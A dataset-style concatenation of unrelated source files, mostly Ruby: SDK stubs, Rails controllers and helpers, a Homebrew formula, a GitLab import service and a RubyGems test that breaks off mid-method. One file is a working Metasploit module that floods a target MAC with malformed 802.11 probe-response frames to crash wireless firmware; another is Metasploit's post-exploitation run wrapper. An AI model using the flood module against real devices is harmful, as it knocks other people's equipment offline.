require_relative 'aws-sdk-rds/db_cluster'
require_relative 'aws-sdk-rds/db_cluster_parameter_group'
require_relative 'aws-sdk-rds/db_cluster_snapshot'
require_relative 'aws-sdk-rds/db_engine'
require_relative 'aws-sdk-rds/db_engine_version'
require_relative 'aws-sdk-rds/db_instance'
require_relative 'aws-sdk-rds/db_log_file'
require_relative 'aws-sdk-rds/db_parameter_group'
require_relative 'aws-sdk-rds/db_parameter_group_family'
require_relative 'aws-sdk-rds/db_security_group'
require_relative 'aws-sdk-rds/db_snapshot'
require_relative 'aws-sdk-rds/db_snapshot_attribute'
require_relative 'aws-sdk-rds/db_subnet_group'
require_relative 'aws-sdk-rds/event_category_map'
require_relative 'aws-sdk-rds/event'
require_relative 'aws-sdk-rds/event_subscription'
require_relative 'aws-sdk-rds/option_group'
require_relative 'aws-sdk-rds/option_group_option'
require_relative 'aws-sdk-rds/parameter'
require_relative 'aws-sdk-rds/pending_maintenance_action'
require_relative 'aws-sdk-rds/reserved_db_instance'
require_relative 'aws-sdk-rds/reserved_db_instances_offering'
require_relative 'aws-sdk-rds/resource_pending_maintenance_action_list'
require_relative 'aws-sdk-rds/customizations'
# This module provides support for Amazon Relational Database Service. This module is available in the
# `aws-sdk-rds` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from Amazon Relational Database Service all
# extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::RDS::Errors::ServiceError
# # rescues all service API errors
# end
#
# See {Errors} for more information.
#
# @service
module Aws::RDS
GEM_VERSION = '1.18.0'
end
| 32.972973 | 102 | 0.80082 |
d54a8a032e58c50639eb8970234a2a222920e254 | 2,297 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response',
'Description' => %q{
This module exploits a firmware-level vulnerability in a variety of
802.11b devices. This attack works by sending a probe response frame
containing a NULL SSID information element to an affected device. This
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
Orinoco, and the first generation of Airport cards).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'],
['WVE', '2006-0064']
]
))
register_options(
[
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
], self.class)
end
def run
open_wifi
cnt = datastore['COUNT'].to_i
print_status("Creating malicious probe response frame...")
frame = create_frame()
print_status("Sending #{cnt} frames...")
cnt.times { wifi.write(frame) }
end
def create_frame
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
caps = [rand(65535)].pack('n')
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
Rex::Text.rand_text(2) + # beacon interval
Rex::Text.rand_text(2) + # capabilities
[0, 0].pack('CC') # Type=SSID(0) Length=0
return frame
end
end
| 29.831169 | 83 | 0.566391 |
edb9dc8ad91e86903ab76b023f8eb6e526c0c3fd | 2,980 | # frozen_string_literal: true
module Import
module GitlabProjects
class CreateProjectFromRemoteFileService < CreateProjectFromUploadedFileService
FILE_SIZE_LIMIT = 10.gigabytes
ALLOWED_CONTENT_TYPES = [
'application/gzip', # most common content-type when fetching a tar.gz
'application/x-tar' # aws-s3 uses x-tar for tar.gz files
].freeze
validate :valid_remote_import_url?
validate :validate_file_size
validate :validate_content_type
private
def required_params
[:path, :namespace, :remote_import_url]
end
def project_params
super
.except(:file)
.merge(import_export_upload: ::ImportExportUpload.new(
remote_import_url: params[:remote_import_url]
))
end
def valid_remote_import_url?
::Gitlab::UrlBlocker.validate!(
params[:remote_import_url],
allow_localhost: allow_local_requests?,
allow_local_network: allow_local_requests?,
schemes: %w(http https)
)
true
rescue ::Gitlab::UrlBlocker::BlockedUrlError => e
errors.add(:base, e.message)
false
end
def allow_local_requests?
::Gitlab::CurrentSettings.allow_local_requests_from_web_hooks_and_services?
end
def validate_content_type
# AWS-S3 presigned URLs don't respond to HTTP HEAD requests,
# so file type cannot be validated
# https://gitlab.com/gitlab-org/gitlab/-/merge_requests/75170#note_748059103
return if amazon_s3?
if headers['content-type'].blank?
errors.add(:base, "Missing 'ContentType' header")
elsif !ALLOWED_CONTENT_TYPES.include?(headers['content-type'])
errors.add(:base, "Remote file content type '%{content_type}' not allowed. (Allowed content types: %{allowed})" % {
content_type: headers['content-type'],
allowed: ALLOWED_CONTENT_TYPES.join(', ')
})
end
end
def validate_file_size
# AWS-S3 presigned URLs don't respond to HTTP HEAD requests,
# so file size cannot be validated
# https://gitlab.com/gitlab-org/gitlab/-/merge_requests/75170#note_748059103
return if amazon_s3?
if headers['content-length'].to_i == 0
errors.add(:base, "Missing 'ContentLength' header")
elsif headers['content-length'].to_i > FILE_SIZE_LIMIT
errors.add(:base, 'Remote file larger than limit. (limit %{limit})' % {
limit: ActiveSupport::NumberHelper.number_to_human_size(FILE_SIZE_LIMIT)
})
end
end
def amazon_s3?
headers['Server'] == 'AmazonS3' && headers['x-amz-request-id'].present?
end
def headers
return {} if params[:remote_import_url].blank? || !valid_remote_import_url?
@headers ||= Gitlab::HTTP.head(params[:remote_import_url]).headers
end
end
end
end
| 32.391304 | 125 | 0.641946 |
287da781e283b466ed96244c117ecb13afc0228d | 481 | module Calagator
class Event < ActiveRecord::Base
class SearchEngine
cattr_accessor(:kind) { :sql }
def self.search(*args)
search_engine.search(*args)
end
def self.use(kind)
self.kind = kind
search_engine.configure if search_engine.respond_to?(:configure)
end
def self.score?
search_engine.score?
end
private_class_method
def self.search_engine
kind == :sunspot ? ApacheSunspot : Sql
end
end
end
end
| 16.586207 | 70 | 0.663202 |
e98733c82dda6de3325093b3ab6b7298a4c0aaf9 | 361 | require "spec_helper"
describe OpenXml::Pptx::Properties::NonVisualConnectionShapeDrawingProperties do
include PropertyTestMacros
it_should_use tag: :cNvCxnSpPr, name: "non_visual_connection_shape_drawing_properties"
it_should_have_properties :connection_shape_locks, :connection_start,
:connection_end, :extension_list
end
| 32.818182 | 88 | 0.789474 |
0380947218886f3164d7aff69f4058c2ecdda686 | 11,836 | # frozen_string_literal: true
class RegistrationsController < Devise::RegistrationsController
prepend Dmpopidor::Controllers::Registrations
include OrgSelectable
def edit
@user = current_user
@prefs = @user.get_preferences(:email)
@languages = Language.sorted_by_abbreviation
@orgs = Org.order("name")
@other_organisations = Org.where(is_other: true).pluck(:id)
@identifier_schemes = IdentifierScheme.for_users.order(:name)
@default_org = current_user.org
if !@prefs
flash[:alert] = "No default preferences found (should be in branding.yml)."
end
end
# GET /resource
def new
oauth = { provider: nil, uid: nil }
IdentifierScheme.for_users.each do |scheme|
unless session["devise.#{scheme.name.downcase}_data"].nil?
oauth = session["devise.#{scheme.name.downcase}_data"]
end
end
@user = User.new
unless oauth.nil?
# The OAuth provider could not be determined or there was no unique UID!
if !oauth["provider"].nil? && !oauth["uid"].nil?
# Connect the new user with the identifier sent back by the OAuth provider
# rubocop:disable Metrics/LineLength
flash[:notice] = _("Please make a choice below. After linking your details to a %{application_name} account, you will be able to sign in directly with your institutional credentials.") % {
application_name: Rails.configuration.branding[:application][:name]
}
end
end
end
# POST /resource
def create
oauth = { provider: nil, uid: nil }
IdentifierScheme.for_users.each do |scheme|
unless session["devise.#{scheme.name.downcase}_data"].nil?
oauth = session["devise.#{scheme.name.downcase}_data"]
end
end
if params[:user][:accept_terms].to_s == "0"
redirect_to after_sign_up_error_path_for(resource),
alert: _("You must accept the terms and conditions to register.")
elsif params[:user][:org_id].blank?
# rubocop:disable Metrics/LineLength
redirect_to after_sign_up_error_path_for(resource),
alert: _("Please select an organisation from the list, or enter your organisation's name.")
# rubocop:enable Metrics/LineLength
else
existing_user = User.where_case_insensitive("email", sign_up_params[:email]).first
if existing_user.present?
if existing_user.invitation_token.present? && !existing_user.accept_terms?
# Destroys the existing user since the accept terms are nil/false. and they
# have an invitation Note any existing role for that user will be deleted too.
# Added to accommodate issue at: https://github.com/DMPRoadmap/roadmap/issues/322
# when invited user creates an account outside the invite workflow
existing_user.destroy
else
redirect_to after_sign_up_error_path_for(resource),
alert: _("That email address is already registered.")
return
end
end
# Handle the Org selection
attrs = sign_up_params
attrs = handle_org(attrs: attrs)
build_resource(attrs)
# Determine if reCAPTCHA is enabled and if so verify it
use_recaptcha = Rails.configuration.branding[:application][:use_recaptcha] || false
if (!use_recaptcha || verify_recaptcha(model: resource)) && resource.save
if resource.active_for_authentication?
set_flash_message :notice, :signed_up if is_navigational_format?
sign_up(resource_name, resource)
UserMailer.welcome_notification(current_user).deliver_now
unless oauth.nil?
# The OAuth provider could not be determined or there was no unique UID!
unless oauth["provider"].nil? || oauth["uid"].nil?
prov = IdentifierScheme.find_by(name: oauth["provider"].downcase)
# Until we enable ORCID signups
if prov.present? && prov.name == "shibboleth"
Identifier.create(identifier_scheme: prov,
value: oauth["uid"],
attrs: oauth,
identifiable: resource)
# rubocop:disable Metrics/LineLength
flash[:notice] = _("Welcome! You have signed up successfully with your institutional credentials. You will now be able to access your account with them.")
# rubocop:enable Metrics/LineLength
end
end
end
respond_with resource, location: after_sign_up_path_for(resource)
else
if is_navigational_format?
set_flash_message :notice, :"signed_up_but_#{resource.inactive_message}"
respond_with resource, location: after_inactive_sign_up_path_for(resource)
end
end
else
clean_up_passwords resource
# rubocop:disable Metrics/LineLength
redirect_to after_sign_up_error_path_for(resource),
alert: _("Unable to create your account.#{errors_for_display(resource)}")
# rubocop:enable Metrics/LineLength
end
end
end
def update
if user_signed_in? then
@prefs = @user.get_preferences(:email)
@orgs = Org.order("name")
@default_org = current_user.org
@other_organisations = Org.where(is_other: true).pluck(:id)
@identifier_schemes = IdentifierScheme.for_users.order(:name)
@languages = Language.sorted_by_abbreviation
if params[:skip_personal_details] == "true"
do_update_password(current_user, params)
else
do_update(require_password = needs_password?(current_user, params))
end
else
render(file: File.join(Rails.root, "public/403.html"), status: 403, layout: false)
end
end
private
# check if we need password to update user data
# ie if password or email was changed
# extend this as needed
def needs_password?(user, params)
user.email != params[:user][:email] || params[:user][:password].present?
end
def do_update(require_password = true, confirm = false)
mandatory_params = true
# added to by below, overwritten otherwise
message = _("Save Unsuccessful. ")
# ensure that the required fields are present
if params[:user][:email].blank?
message += _("Please enter an email address. ")
mandatory_params &&= false
end
if params[:user][:firstname].blank?
message += _("Please enter a First name. ")
mandatory_params &&= false
end
if params[:user][:surname].blank?
message += _("Please enter a Last name. ")
mandatory_params &&= false
end
if params[:user][:org_id].blank? && params[:user][:other_organisation].blank?
# rubocop:disable Metrics/LineLength
message += _("Please select an organisation from the list, or enter your organisation's name.")
# rubocop:enable Metrics/LineLength
mandatory_params &&= false
end
# has the user entered all the details
if mandatory_params
# Handle the Org selection
attrs = update_params
attrs = handle_org(attrs: attrs)
# user is changing email or password
if require_password
# if user is changing email
if current_user.email != attrs[:email]
# password needs to be present
if params[:user][:password].blank?
message = _("Please enter your password to change email address.")
successfully_updated = false
else
successfully_updated = current_user.update_with_password(attrs)
if !successfully_updated
message = _("Save unsuccessful. \
That email address is already registered. \
You must enter a unique email address.")
end
end
else
# This case is never reached since this method when called with
# require_password = true is because the email changed.
# The case for password changed goes to do_update_password instead
successfully_updated = current_user.update_without_password(attrs)
end
else
# password not required
successfully_updated = current_user.update_without_password(attrs)
end
else
successfully_updated = false
end
# unlink shibboleth from user's details
if params[:unlink_flag] == "true" then
current_user.update_attributes(shibboleth_id: "")
end
# render the correct page
if successfully_updated
if confirm
# will error out if confirmable is turned off in user model
current_user.skip_confirmation!
current_user.save!
end
session[:locale] = current_user.get_locale unless current_user.get_locale.nil?
# Method defined at controllers/application_controller.rb
set_gettext_locale
set_flash_message :notice, success_message(current_user, _("saved"))
# Sign in the user bypassing validation in case his password changed
sign_in current_user, bypass: true
redirect_to "#{edit_user_registration_path}\#personal-details",
notice: success_message(current_user, _("saved"))
else
flash[:alert] = message.blank? ? failure_message(current_user, _("save")) : message
render "edit"
end
end
def do_update_password(current_user, params)
if params[:user][:current_password].blank?
message = _("Please enter your current password")
elsif params[:user][:password_confirmation].blank?
message = _("Please enter a password confirmation")
elsif params[:user][:password] != params[:user][:password_confirmation]
message = _("Password and comfirmation must match")
else
successfully_updated = current_user.update_with_password(password_update)
end
# render the correct page
if successfully_updated
session[:locale] = current_user.get_locale unless current_user.get_locale.nil?
# Method defined at controllers/application_controller.rbset_gettext_locale
set_flash_message :notice, success_message(current_user, _("saved"))
# TODO this method is deprecated
sign_in current_user, bypass: true
redirect_to "#{edit_user_registration_path}\#password-details",
notice: success_message(current_user, _("saved"))
else
flash[:alert] = message.blank? ? failure_message(current_user, _("save")) : message
redirect_to "#{edit_user_registration_path}\#password-details"
end
end
def sign_up_params
params.require(:user).permit(:email, :password, :password_confirmation,
:firstname, :surname, :recovery_email,
:accept_terms, :org_id, :org_name,
:org_crosswalk)
end
def update_params
params.require(:user).permit(:firstname, :org_id, :language_id,
:surname, :department_id, :org_id,
:org_name, :org_crosswalk)
end
def password_update
params.require(:user).permit(:email, :firstname, :current_password,
:language_id, :password,
:password_confirmation, :surname,
:department_id, :org_id, :org_name,
:org_crosswalk)
end
# Finds or creates the selected org and then returns it's id
def handle_org(attrs:)
return attrs unless attrs.present? && attrs[:org_id].present?
org = org_from_params(params_in: attrs, allow_create: true)
# Remove the extraneous Org Selector hidden fields
attrs = remove_org_selection_params(params_in: attrs)
return attrs unless org.present?
# reattach the org_id but with the Org id instead of the hash
attrs[:org_id] = org.id
attrs
end
end
| 39.192053 | 196 | 0.657063 |
1aafff502d39a904d6e51020e3cad8009e6f553d | 659 | require 'spec_helper'
require 'fetchers/service_binding_create_fetcher'
module VCAP::CloudController
RSpec.describe ServiceBindingCreateFetcher do
describe '#fetch' do
let(:app_model) { AppModel.make(name: 'my-app') }
let(:service_instance) { ServiceInstance.make(name: 'my-service', space_guid: app_model.space.guid) }
it 'returns the app and service instance' do
fetched_app, fetched_instance = ServiceBindingCreateFetcher.new.fetch(app_model.guid, service_instance.guid)
expect(fetched_app.name).to eq(app_model.name)
expect(fetched_instance.name).to eq(service_instance.name)
end
end
end
end
| 34.684211 | 116 | 0.738998 |
ed5e877706c780e939836591642568e22da5884b | 1,086 | module Fog
class Logger
@channels = {
:deprecation => ::STDERR,
:warning => ::STDERR
}
@channels[:debug] = ::STDERR if ENV["DEBUG"]
def self.[](channel)
@channels[channel]
end
def self.[]=(channel, value)
@channels[channel] = value
end
def self.debug(message)
write(:debug, "[light_black][fog][DEBUG] #{message}[/]\n")
end
def self.deprecation(message)
write(:deprecation, "[yellow][fog][DEPRECATION] #{message}[/]\n")
end
def self.warning(message)
write(:warning, "[yellow][fog][WARNING] #{message}[/]\n")
end
def self.write(key, value)
channel = @channels[key]
if channel
message = if channel.tty?
value.gsub(::Formatador::PARSE_REGEX) { "\e[#{::Formatador::STYLES[$1.to_sym]}m" }.gsub(::Formatador::INDENT_REGEX, "")
else
value.gsub(::Formatador::PARSE_REGEX, "").gsub(::Formatador::INDENT_REGEX, "")
end
channel.write(message)
end
nil
end
end
end
| 24.681818 | 139 | 0.548803 |
1a1e679394f238263b7699ff52dd89587206833e | 1,563 | OnoBurrito::Application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
config.cache_classes = true
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = false
# Configure static asset server for tests with Cache-Control for performance.
config.serve_static_assets = true
config.static_cache_control = "public, max-age=3600"
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = true
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
end
| 42.243243 | 85 | 0.774792 |
b99e9daf4fb46d7f7522264bbc351db75f993269 | 2,340 | module ApplicationHelper
module Navbar
def menu_to_json(placement = :default)
Menu::Manager.menu(placement).map do |menu_section|
item_to_hash(menu_section) if menu_section.visible?
end.compact
end
def item_to_hash(item)
{
:id => item.id.to_s,
:title => item.name,
:icon => item.icon,
:href => item.href,
:type => item.type,
:visible => item.visible?,
:active => item_active?(item),
:items => item.items.to_a.select(&:visible?).map(&method(:item_to_hash))
}
end
# FIXME: The 'active' below is an active section not an item. That is wrong.
# What works is the "legacy" part that compares @layout to item.id.
# This assumes that these matches -- @layout and item.id. Moving forward we
# need to remove that assumption. However to do that we need figure some way
# to identify the active menu item here.
def item_active?(item)
if item.leaf?
# FIXME: remove @layout condition when every controller sets menu_section properly
active = controller.menu_section_id(controller.params) || @layout.to_sym
item.id.to_sym == active || item.id.to_sym == @layout.to_sym
else
return section_nav_class_iframe(item) if params[:action] == 'iframe'
active = controller.menu_section_id(controller.params) || @layout.to_sym
if item.parent.nil?
# first-level, fallback to old logic for now
# FIXME: exception behavior to remove
active = 'my_tasks' if %w[my_tasks all_tasks].include?(@layout)
active = 'cloud_volume' if @layout == 'cloud_volume_snapshot' || @layout == 'cloud_volume_backup'
active = 'cloud_object_store_container' if @layout == 'cloud_object_store_object'
active = active.to_sym
end
# FIXME: remove to_s, to_sym once all items use symbol ids
item.id.to_sym == active ||
item.contains_item_id?(active.to_s) ||
item.contains_item_id?(active.to_sym)
end
end
# special handling for custom menu sections and items
def section_nav_class_iframe(section)
params[:sid].present? && section.id.to_s == params[:sid] ||
params[:id].present? && section.contains_item_id?(params[:id])
end
end
end
| 39 | 107 | 0.639316 |
1aa2155b6240e407eda8515cfc1375b75ac21bd4 | 2,479 | module SessionsHelper
# Remembers a user in a persistent session.
def remember(user)
user.remember
cookies.permanent.signed[:user_id] = user.id
cookies.permanent[:remember_token] = user.remember_token
end
# Logs in the given user.
def log_in(user)
#session is eine methode von rails
#zuweisung der userid an die session
session[:user_id] = user.id
end
# Returns the current logged-in user (if any).
# wir merken uns den User der eingelog ist mit seiner sessionid
#@current_user = @current_user || User.find_by(id: session[:user_id])
#wenn current_user schon einen wert zu gewiesen wurde dann wird die
#User.find methode nicht benutzt
# >> @foo
# => nil
# >> @foo = @foo || "bar"
# => "bar"
# >> @foo = @foo || "baz"
# => "bar"
#
# das sieht nicht gut aus deswegen der untere ansatz
# if @current_user.nil?
# @current_user = User.find_by(id: session[:user_id])
# else
# @current_user
# end
# def current_user
# if session[:user_id]
# #User.find_by(id: 3) -> wie in der Datenbank die methode
# @current_user ||= User.find_by(id: session[:user_id])
# end
# end
# advanced login
# Returns the user corresponding to the remember token cookie.
def current_user
if (user_id = session[:user_id]) #while setting user_id = session[:user_id]
@current_user ||= User.find_by(id: user_id)
elsif (user_id = cookies.signed[:user_id])
#raise # The tests still pass, so this branch is currently untested.
user = User.find_by(id: user_id)
if user && user.authenticated?(:remember, cookies[:remember_token])
log_in user
@current_user = user
end
end
end
def current_user?(user)
user == current_user
end
# Returns true if the user is logged in, false otherwise.
def logged_in?
!current_user.nil?
end
# Forgets a persistent session.
def forget(user)
user.forget
cookies.delete(:user_id)
cookies.delete(:remember_token)
end
# Logs out the current user.
def log_out
forget(current_user)
session.delete(:user_id)
@current_user = nil
end
# Redirects to stored location (or to the default).
def redirect_back_or(default)
redirect_to(session[:forwarding_url] || default)
session.delete(:forwarding_url)
end
# Stores the URL trying to be accessed.
def store_location
session[:forwarding_url] = request.original_url if request.get?
end
end
| 26.37234 | 80 | 0.670028 |
6122d8e08641e47d9a6f6b5036b844fbf84542d3 | 3,992 | # -*- coding: binary -*-
module Msf
module Simple
###
#
# A simplified post-exploitation module wrapper.
#
###
module Post
include Module
#
# Wraps the post-exploitation module running process in a simple single
# method. The options hash can have the following values passed in it:
#
# OptionStr
#
# A string of comma separated option values that should be imported into
# the datastore.
#
# Options
#
# A hash of values to be imported directly into the datastore.
#
# LocalInput
#
# The local input handle that data can be read in from.
#
# LocalOutput
#
# The local output through which data can be displayed.
#
# RunAsJob
#
# Whether or not the module should be run in the context of a background
# job.
#
def self.run_simple(omod, opts = {}, &block)
# Clone the module to prevent changes to the original instance
mod = omod.replicant
Msf::Simple::Framework.simplify_module( mod, false )
yield(mod) if block_given?
# Import options from the OptionStr or Option hash.
mod._import_extra_options(opts)
# Verify the options
mod.options.validate(mod.datastore)
# Initialize user interaction
if ! opts['Quiet']
mod.init_ui(opts['LocalInput'] || mod.user_input, opts['LocalOutput'] || mod.user_output)
else
mod.init_ui(nil, nil)
end
#
# Disable this until we can test background stuff a little better
#
if(mod.passive? or opts['RunAsJob'])
ctx = [ mod.replicant ]
mod.job_id = mod.framework.jobs.start_bg_job(
"Post: #{mod.refname}",
ctx,
Proc.new { |ctx_| self.job_run_proc(ctx_) },
Proc.new { |ctx_| self.job_cleanup_proc(ctx_) }
)
# Propagate this back to the caller for console mgmt
omod.job_id = mod.job_id
else
ctx = [ mod ]
self.job_run_proc(ctx)
self.job_cleanup_proc(ctx)
end
end
#
# Calls the class method.
#
def run_simple(opts = {}, &block)
Msf::Simple::Post.run_simple(self, opts, &block)
end
protected
#
# Job run proc, sets up the module and kicks it off.
#
# XXX: Mostly Copy/pasted from simple/auxiliary.rb
#
def self.job_run_proc(ctx)
mod = ctx[0]
begin
mod.setup
mod.framework.events.on_module_run(mod)
# Grab the session object since we need to fire an event for not
# only the normal module_run event that all module types have to
# report, but a specific event for sessions as well.
s = mod.framework.sessions.get(mod.datastore["SESSION"])
if s
mod.framework.events.on_session_module_run(s, mod)
mod.run
else
mod.print_error("Session not found")
mod.cleanup
return
end
rescue Msf::Post::Complete
mod.cleanup
return
rescue Msf::Post::Failed => e
mod.error = e
mod.print_error("Post aborted due to failure: #{e.message}")
mod.cleanup
return
rescue ::Timeout::Error => e
mod.error = e
mod.print_error("Post triggered a timeout exception")
mod.cleanup
return
rescue ::Interrupt => e
mod.error = e
mod.print_error("Post interrupted by the console user")
mod.cleanup
return
rescue ::Exception => e
mod.error = e
mod.print_error("Post failed: #{e.class} #{e}")
if(e.class.to_s != 'Msf::OptionValidateError')
mod.print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple.post.rb/
mod.print_error(" #{line}")
end
end
elog('Post failed', error: e)
mod.cleanup
return
end
end
#
# Clean up the module after the job completes.
#
# Copy/pasted from simple/auxiliary.rb
#
def self.job_cleanup_proc(ctx)
mod = ctx[0]
mod.framework.events.on_module_complete(mod)
# Allow the exploit to cleanup after itself, that messy bugger.
mod.cleanup
end
end
end
end
| 24.490798 | 95 | 0.633517 |
2140541429637a8bf84048c6568ac9f45c58fa51 | 1,052 | class Mill < Formula
desc "Scala build tool"
homepage "https://com-lihaoyi.github.io/mill/mill/Intro_to_Mill.html"
url "https://github.com/com-lihaoyi/mill/releases/download/0.9.9/0.9.9-assembly"
sha256 "1c84fb6f1304cfb8e94ac62fa2137dfb362ec827ff01113b85de3c60c4e8f7fe"
license "MIT"
livecheck do
url :stable
regex(/^v?(\d+(?:\.\d+)+)$/i)
end
bottle do
sha256 cellar: :any_skip_relocation, x86_64_linux: "497cf7b1a50b966f535ac16df62ce69ebe05e21a45080f880840f2d10c10b6da" # linuxbrew-core
end
depends_on "openjdk"
def install
libexec.install Dir["*"].shift => "mill"
chmod 0555, libexec/"mill"
(bin/"mill").write_env_script libexec/"mill", Language::Java.overridable_java_home_env
end
test do
(testpath/"build.sc").write <<~EOS
import mill._
import mill.scalalib._
object foo extends ScalaModule {
def scalaVersion = "2.12.8"
}
EOS
output = shell_output("#{bin}/mill resolve __.compile")
assert_equal "foo.compile", output.lines.last.chomp
end
end
| 28.432432 | 138 | 0.701521 |
bbee2b193ff35ae6b29a6240daf408dc4cda4ae5 | 114 | class Admin::DashboardController < ApplicationController
before_action :authenticate_user!
def index
end
end
| 16.285714 | 56 | 0.824561 |
6a0238ecfa238195c0758fb260da981f18ca6886 | 1,481 | class UserAgent
module Browsers
class Gecko < Base
def self.extend?(agent)
agent.application && agent.application.product == "Mozilla"
end
GeckoBrowsers = %w(
PaleMoon
Firefox
Camino
Iceweasel
Seamonkey
).freeze
def browser
GeckoBrowsers.detect { |browser| respond_to?(browser) } || super
end
def version
v = send(browser).version
v.nil? ? super : v
end
def platform
if comment = application.comment
if comment[0] == 'compatible' || comment[0] == 'Mobile'
nil
elsif /^Windows / =~ comment[0]
'Windows'
elsif comment.any? { |c| c =~ /Android/ }
'Android'
else
comment[0]
end
end
end
def security
Security[application.comment[1]] || :strong
end
def os
if comment = application.comment
i = if comment[1] == 'U'
2
elsif /^Windows / =~ comment[0] || /^Android/ =~ comment[0]
0
elsif comment[0] == 'Mobile'
nil
else
1
end
return nil if i.nil?
OperatingSystems.normalize_os(comment[i])
end
end
def localization
if comment = application.comment
comment[3]
end
end
end
end
end
| 21.463768 | 73 | 0.47603 |
61e92bd1dfd6b18ba72e3c429fe1442aeb2e7556 | 5,729 | # frozen_string_literal: true
require 'rubygems/test_case'
require 'rubygems/user_interaction'
require 'timeout'
class TestGemStreamUI < Gem::TestCase
SHORT_TIMEOUT = (defined?(RubyVM::MJIT) && RubyVM::MJIT.enabled?) ? 1.0 : 0.1 # increase timeout with MJIT for --jit-wait testing
module IsTty
attr_accessor :tty
def tty?
@tty = true unless defined? @tty
return @tty
end
alias_method :isatty, :tty?
def noecho
yield self
end
end
def setup
super
@cfg = Gem.configuration
@in = StringIO.new
@out = StringIO.new
@err = StringIO.new
@in.extend IsTty
@out.extend IsTty
@sui = Gem::StreamUI.new @in, @out, @err, true
end
def test_ask
Timeout.timeout(5) do
expected_answer = "Arthur, King of the Britons"
@in.string = "#{expected_answer}\n"
actual_answer = @sui.ask("What is your name?")
assert_equal expected_answer, actual_answer
end
end
def test_ask_no_tty
@in.tty = false
Timeout.timeout(SHORT_TIMEOUT) do
answer = @sui.ask("what is your favorite color?")
assert_nil answer
end
end
def test_ask_for_password
Timeout.timeout(5) do
expected_answer = "Arthur, King of the Britons"
@in.string = "#{expected_answer}\n"
actual_answer = @sui.ask_for_password("What is your name?")
assert_equal expected_answer, actual_answer
end
end
def test_ask_for_password_no_tty
@in.tty = false
Timeout.timeout(SHORT_TIMEOUT) do
answer = @sui.ask_for_password("what is the airspeed velocity of an unladen swallow?")
assert_nil answer
end
end
def test_ask_yes_no_no_tty_with_default
@in.tty = false
Timeout.timeout(SHORT_TIMEOUT) do
answer = @sui.ask_yes_no("do coconuts migrate?", false)
assert_equal false, answer
answer = @sui.ask_yes_no("do coconuts migrate?", true)
assert_equal true, answer
end
end
def test_ask_yes_no_no_tty_without_default
@in.tty = false
Timeout.timeout(SHORT_TIMEOUT) do
assert_raises(Gem::OperationNotSupportedError) do
@sui.ask_yes_no("do coconuts migrate?")
end
end
end
def test_choose_from_list
@in.puts "1"
@in.rewind
result = @sui.choose_from_list 'which one?', %w[foo bar]
assert_equal ['foo', 0], result
assert_equal "which one?\n 1. foo\n 2. bar\n> ", @out.string
end
def test_choose_from_list_EOF
result = @sui.choose_from_list 'which one?', %w[foo bar]
assert_equal [nil, nil], result
assert_equal "which one?\n 1. foo\n 2. bar\n> ", @out.string
end
def test_progress_reporter_silent_nil
@cfg.verbose = nil
reporter = @sui.progress_reporter 10, 'hi'
assert_kind_of Gem::StreamUI::SilentProgressReporter, reporter
end
def test_progress_reporter_silent_false
@cfg.verbose = false
reporter = @sui.progress_reporter 10, 'hi'
assert_kind_of Gem::StreamUI::SilentProgressReporter, reporter
assert_equal "", @out.string
end
def test_progress_reporter_simple
@cfg.verbose = true
reporter = @sui.progress_reporter 10, 'hi'
assert_kind_of Gem::StreamUI::SimpleProgressReporter, reporter
assert_equal "hi\n", @out.string
end
def test_progress_reporter_verbose
@cfg.verbose = 0
reporter = @sui.progress_reporter 10, 'hi'
assert_kind_of Gem::StreamUI::VerboseProgressReporter, reporter
assert_equal "hi\n", @out.string
end
def test_download_reporter_silent_nil
@cfg.verbose = nil
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
assert_kind_of Gem::StreamUI::SilentDownloadReporter, reporter
assert_equal "", @out.string
end
def test_download_reporter_silent_false
@cfg.verbose = false
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
assert_kind_of Gem::StreamUI::SilentDownloadReporter, reporter
assert_equal "", @out.string
end
def test_download_reporter_anything
@cfg.verbose = 0
reporter = @sui.download_reporter
assert_kind_of Gem::StreamUI::ThreadedDownloadReporter, reporter
end
def test_threaded_download_reporter
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_progress
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
reporter.update 512
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_progress_once
@cfg.verbose = true
reporter = @sui.download_reporter
reporter.fetch 'a.gem', 1024
reporter.update 510
reporter.update 512
assert_equal "Fetching a.gem\n", @out.string
end
def test_verbose_download_reporter_progress_complete
@cfg.verbose = true
